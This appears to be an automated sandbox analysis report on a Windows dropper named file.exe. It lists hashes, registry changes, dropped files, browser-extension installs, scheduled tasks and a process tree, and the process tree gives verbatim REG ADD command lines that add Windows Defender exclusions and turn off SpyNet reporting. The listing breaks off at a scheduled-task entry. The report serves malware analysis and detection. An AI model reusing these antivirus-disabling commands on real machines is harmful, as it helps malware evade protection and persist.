Analysis
max time kernel: 150s
max time network: 153s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 17/10/2022, 19:50

Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20220812-en
General
Target: file.exe
Size: 7.2MB
MD5: a35dbba262db9ae584fbdec0e6323cac
SHA1: 9d62d9517e1e6542a9f57bcd10dcea0eaf10723d
SHA256: 87f63e1fac30814b0d9fe2137da82c3aafc2c29e217596d47dca5addd6e0ecd7
SHA512: 22d31687685d0995c2b5bb1f4a196dceba3e4ef3c3d274179504ec99d70fb8c2646664d8b080b4e26abde4180fa12ee4ee966988f8f0a78965e41789f8c2f53f
SSDEEP: 196608:91OjAn0WZazjJgyd5FL9355pry0FTqIW8semyMdOzO1kh:3OnW0nJv95/pe0vfgtE
Malware Config
Signatures
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uGQUxmMVndUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe (x2)
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sVKkdmDjU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uGQUxmMVndUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | conhost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe (x3)
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZbDVoFOXNENU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\qZroPUUiMzyEdOVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oEaTcchOPpGVC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oEaTcchOPpGVC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\VfwdWomTKRqEvmNQn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\rxGmlNEdrxIyNebK = "0" | reg.exe (x2)
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZbDVoFOXNENU2 = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe (x2)
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\qZroPUUiMzyEdOVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\rxGmlNEdrxIyNebK = "0" | conhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\rxGmlNEdrxIyNebK = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe (x2)
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sVKkdmDjU = "0" | reg.exe
Executes dropped EXE 4 IoCs
pid | Process
1848 | Install.exe
2044 | Install.exe
536 | WKxmouy.exe
1860 | xHZNvQg.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation | xHZNvQg.exe
Loads dropped DLL 12 IoCs
pid | Process
1088 | file.exe
1848 | Install.exe (x4)
2044 | Install.exe (x3)
1936 | rundll32.exe (x4)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | xHZNvQg.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json | xHZNvQg.exe
Drops file in System32 directory 22 IoCs
description | ioc | Process
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | xHZNvQg.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | xHZNvQg.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | WKxmouy.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE (x2)
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 | xHZNvQg.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | WKxmouy.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 | xHZNvQg.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | WKxmouy.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 | xHZNvQg.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 | xHZNvQg.exe
Drops file in Program Files directory 13 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\oEaTcchOPpGVC\fwukPuz.dll | xHZNvQg.exe
File created | C:\Program Files (x86)\sVKkdmDjU\BoLWlc.dll | xHZNvQg.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | xHZNvQg.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | xHZNvQg.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | xHZNvQg.exe
File created | C:\Program Files (x86)\ZbDVoFOXNENU2\sBMooLMWDlzch.dll | xHZNvQg.exe
File created | C:\Program Files (x86)\ZbDVoFOXNENU2\ADlLMVt.xml | xHZNvQg.exe
File created | C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR\GnLhcfs.dll | xHZNvQg.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | xHZNvQg.exe
File created | C:\Program Files (x86)\sVKkdmDjU\PrunerE.xml | xHZNvQg.exe
File created | C:\Program Files (x86)\asOZAkGzCLZmAmYQNDR\gYYCjto.xml | xHZNvQg.exe
File created | C:\Program Files (x86)\oEaTcchOPpGVC\JjpmzGh.xml | xHZNvQg.exe
File created | C:\Program Files (x86)\uGQUxmMVndUn\UITdtaG.dll | xHZNvQg.exe
Drops file in Windows directory 4 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\CXoLteMjLNFiDzwgz.job | schtasks.exe
File created | C:\Windows\Tasks\qryHMmQcYEgLlBC.job | schtasks.exe
File created | C:\Windows\Tasks\PEfpnAabivfJAexgy.job | schtasks.exe
File created | C:\Windows\Tasks\bNmmFmDfYxkEbHwDyL.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
432 | schtasks.exe
1980 | schtasks.exe
2032 | schtasks.exe
1184 | schtasks.exe
1052 | schtasks.exe
1120 | schtasks.exe
1104 | schtasks.exe
548 | schtasks.exe
1056 | schtasks.exe
592 | schtasks.exe
1252 | schtasks.exe
1992 | schtasks.exe
1332 | schtasks.exe
Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | xHZNvQg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{75538D86-5D3D-416F-AD75-E96D1A96F6C3}\WpadNetworkName = "Network 3" | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | xHZNvQg.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | xHZNvQg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | xHZNvQg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | wscript.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1e-99-72-cf-ac-0a\WpadDecisionTime = 10648ab372e2d801 | xHZNvQg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{75538D86-5D3D-416F-AD75-E96D1A96F6C3}\1e-99-72-cf-ac-0a | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | wscript.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | xHZNvQg.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{75538D86-5D3D-416F-AD75-E96D1A96F6C3}\WpadDecisionTime = 10648ab372e2d801 | xHZNvQg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1e-99-72-cf-ac-0a\WpadDecisionReason = "1" | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | xHZNvQg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{75538D86-5D3D-416F-AD75-E96D1A96F6C3}\WpadDecisionReason = "1" | xHZNvQg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | xHZNvQg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | xHZNvQg.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | xHZNvQg.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | xHZNvQg.exe

description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | xHZNvQg.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = … | xHZNvQg.exe
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid | Process
1920 | powershell.EXE (x3)
2028 | powershell.EXE (x3)
1580 | powershell.EXE (x3)
268 | powershell.EXE (x3)
1860 | xHZNvQg.exe (x16)
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1920 | powershell.EXE
Token: SeDebugPrivilege | 2028 | powershell.EXE
Token: SeDebugPrivilege | 1580 | powershell.EXE
Token: SeDebugPrivilege | 268 | powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 1088 wrote to memory of 1848 | 1088 | file.exe | 28 (x7)
PID 1848 wrote to memory of 2044 | 1848 | Install.exe | 29 (x7)
PID 2044 wrote to memory of 1136 | 2044 | Install.exe | 31 (x7)
PID 2044 wrote to memory of 268 | 2044 | Install.exe | 33 (x7)
PID 268 wrote to memory of 432 | 268 | forfiles.exe | 36 (x7)
PID 1136 wrote to memory of 1120 | 1136 | forfiles.exe | 35 (x7)
PID 1120 wrote to memory of 536 | 1120 | cmd.exe | 37 (x7)
PID 432 wrote to memory of 1784 | 432 | cmd.exe | 38 (x7)
PID 1120 wrote to memory of 704 | 1120 | cmd.exe | 40 (x7)
PID 432 wrote to memory of 1580 | 432 | cmd.exe | 39
Processes
Each entry gives the image path, the command line as recorded, the signatures triggered by that process and its PID; the bracketed number is the nesting depth in the process tree, and children are indented under their parent.

[1] C:\Users\Admin\AppData\Local\Temp\file.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 1088

    [2] C:\Users\Admin\AppData\Local\Temp\7zSFBEC.tmp\Install.exe
        Command line: .\Install.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 1848

        [3] C:\Users\Admin\AppData\Local\Temp\7zS446.tmp\Install.exe
            Command line: .\Install.exe /S /site_id "525403"
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Loads dropped DLL
            - Drops file in System32 directory
            - Enumerates system info in registry
            - Suspicious use of WriteProcessMemory
            PID: 2044

            [4] C:\Windows\SysWOW64\forfiles.exe
                Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                - Suspicious use of WriteProcessMemory
                PID: 1136

                [5] C:\Windows\SysWOW64\cmd.exe
                    Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    - Suspicious use of WriteProcessMemory
                    PID: 1120

                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                        PID: 536

                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                        PID: 704

            [4] C:\Windows\SysWOW64\forfiles.exe
                Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                - Suspicious use of WriteProcessMemory
                PID: 268

                [5] C:\Windows\SysWOW64\cmd.exe
                    Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                    - Suspicious use of WriteProcessMemory
                    PID: 432

                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                        PID: 1784

                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                        PID: 1580

            [4] C:\Windows\SysWOW64\schtasks.exe
